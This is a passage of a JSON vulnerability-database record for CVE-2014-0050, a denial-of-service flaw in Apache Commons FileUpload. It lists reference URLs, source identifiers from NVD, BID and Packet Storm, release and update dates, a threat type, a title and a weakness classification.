            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0099"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2067"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4322"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5886"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4590"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-2733"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0096"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3544"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4534"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5885"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4431"
          },
          {
            "trust": 0.1,
            "url": "https://bugs.gentoo.org."
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4534"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0050"
          },
          {
            "db": "BID",
            "id": "65400"
          },
          {
            "db": "PACKETSTORM",
            "id": "126007"
          },
          {
            "db": "PACKETSTORM",
            "id": "131089"
          },
          {
            "db": "PACKETSTORM",
            "id": "126144"
          },
          {
            "db": "PACKETSTORM",
            "id": "126746"
          },
          {
            "db": "PACKETSTORM",
            "id": "141092"
          },
          {
            "db": "PACKETSTORM",
            "id": "125687"
          },
          {
            "db": "PACKETSTORM",
            "id": "125109"
          },
          {
            "db": "PACKETSTORM",
            "id": "126754"
          },
          {
            "db": "PACKETSTORM",
            "id": "125119"
          },
          {
            "db": "PACKETSTORM",
            "id": "127215"
          },
          {
            "db": "PACKETSTORM",
            "id": "140605"
          },
          {
            "db": "PACKETSTORM",
            "id": "126052"
          },
          {
            "db": "PACKETSTORM",
            "id": "126404"
          },
          {
            "db": "PACKETSTORM",
            "id": "139721"
          },
          {
            "db": "PACKETSTORM",
            "id": "128211"
          },
          {
            "db": "PACKETSTORM",
            "id": "129553"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0050"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0050",
            "ident": null
          },
          {
            "db": "BID",
            "id": "65400",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "126007",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "131089",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "126144",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "126746",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "141092",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "125687",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "125109",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "126754",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "125119",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "127215",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "140605",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "126052",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "126404",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "139721",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "128211",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "129553",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0050",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2014-04-01T00:00:00",
            "db": "VULMON",
            "id": "CVE-2014-0050",
            "ident": null
          },
          {
            "date": "2014-02-06T00:00:00",
            "db": "BID",
            "id": "65400",
            "ident": null
          },
          {
            "date": "2014-04-03T14:56:00",
            "db": "PACKETSTORM",
            "id": "126007",
            "ident": null
          },
          {
            "date": "2015-03-30T21:20:12",
            "db": "PACKETSTORM",
            "id": "131089",
            "ident": null
          },
          {
            "date": "2014-04-14T22:28:46",
            "db": "PACKETSTORM",
            "id": "126144",
            "ident": null
          },
          {
            "date": "2014-05-22T01:43:07",
            "db": "PACKETSTORM",
            "id": "126746",
            "ident": null
          },
          {
            "date": "2017-02-15T00:39:05",
            "db": "PACKETSTORM",
            "id": "141092",
            "ident": null
          },
          {
            "date": "2014-03-13T21:19:37",
            "db": "PACKETSTORM",
            "id": "125687",
            "ident": null
          },
          {
            "date": "2014-02-07T04:32:05",
            "db": "PACKETSTORM",
            "id": "125109",
            "ident": null
          },
          {
            "date": "2014-05-22T01:44:32",
            "db": "PACKETSTORM",
            "id": "126754",
            "ident": null
          },
          {
            "date": "2014-02-10T23:22:06",
            "db": "PACKETSTORM",
            "id": "125119",
            "ident": null
          },
          {
            "date": "2014-06-25T21:34:12",
            "db": "PACKETSTORM",
            "id": "127215",
            "ident": null
          },
          {
            "date": "2017-01-19T13:56:50",
            "db": "PACKETSTORM",
            "id": "140605",
            "ident": null
          },
          {
            "date": "2014-04-08T21:21:55",
            "db": "PACKETSTORM",
            "id": "126052",
            "ident": null
          },
          {
            "date": "2014-05-01T02:11:10",
            "db": "PACKETSTORM",
            "id": "126404",
            "ident": null
          },
          {
            "date": "2016-11-15T00:42:48",
            "db": "PACKETSTORM",
            "id": "139721",
            "ident": null
          },
          {
            "date": "2014-09-11T21:08:01",
            "db": "PACKETSTORM",
            "id": "128211",
            "ident": null
          },
          {
            "date": "2014-12-15T20:00:49",
            "db": "PACKETSTORM",
            "id": "129553",
            "ident": null
          },
          {
            "date": "2014-04-01T06:27:51.373000",
            "db": "NVD",
            "id": "CVE-2014-0050",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2023-11-07T00:00:00",
            "db": "VULMON",
            "id": "CVE-2014-0050",
            "ident": null
          },
          {
            "date": "2018-07-12T06:00:00",
            "db": "BID",
            "id": "65400",
            "ident": null
          },
          {
            "date": "2025-04-12T10:46:40.837000",
            "db": "NVD",
            "id": "CVE-2014-0050",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "126144"
          },
          {
            "db": "PACKETSTORM",
            "id": "126746"
          },
          {
            "db": "PACKETSTORM",
            "id": "141092"
          },
          {
            "db": "PACKETSTORM",
            "id": "126754"
          }
        ],
        "trust": 0.4
      },
      "title": {
        "_id": null,
        "data": "Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability",
        "sources": [
          {
            "db": "BID",
            "id": "65400"
          }
        ],
        "trust": 0.3
      },
      "type": {
        "_id": null,
        "data": "Failure to Handle Exceptional Conditions",
        "sources": [
          {
            "db": "BID",
            "id": "65400"
          }
        ],
        "trust": 0.3
      }
    }